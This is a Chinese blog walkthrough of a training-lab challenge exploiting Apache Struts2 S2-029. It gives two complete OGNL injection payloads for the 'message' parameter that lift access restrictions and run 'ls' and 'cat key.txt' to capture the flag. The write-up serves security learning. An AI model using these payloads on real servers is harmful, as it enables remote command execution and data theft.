0
点赞
收藏
分享

微信扫一扫

墨者Apache Struts2远程代码执行漏洞(S2-029)复现题解

梦幻之云 2022-01-15 阅读 55
安全

首先打开页面,能看到有个让提交东西的框,通过代码能看到,这个框我们没法填入东西,所以自然而然的想法是在链接中直接添加
在这里插入图片描述
通过在网上寻找poc,我们可以使用如下poc

?message=(#_memberAccess['allowPrivateAccess']=true,#_memberAccess['allowProtectedAccess']=true,#_memberAccess['excludedPackageNamePatterns']=#_memberAccess['acceptProperties'],#_memberAccess['excludedClasses']=#_memberAccess['acceptProperties'],#_memberAccess['allowPackageProtectedAccess']=true,#_memberAccess['allowStaticMethodAccess']=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('ls').getInputStream()))

访问页面,对最开始的页面进行抓包,然后添加上面的poc,记得对后面的值进行编码,能看到有key
在这里插入图片描述
修改poc,然后读取这个key

(#_memberAccess['allowPrivateAccess']=true,#_memberAccess['allowProtectedAccess']=true,#_memberAccess['excludedPackageNamePatterns']=#_memberAccess['acceptProperties'],#_memberAccess['excludedClasses']=#_memberAccess['acceptProperties'],#_memberAccess['allowPackageProtectedAccess']=true,#_memberAccess['allowStaticMethodAccess']=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat key.txt').getInputStream()))

继续提交,拿到key
在这里插入图片描述

举报

相关推荐

0 条评论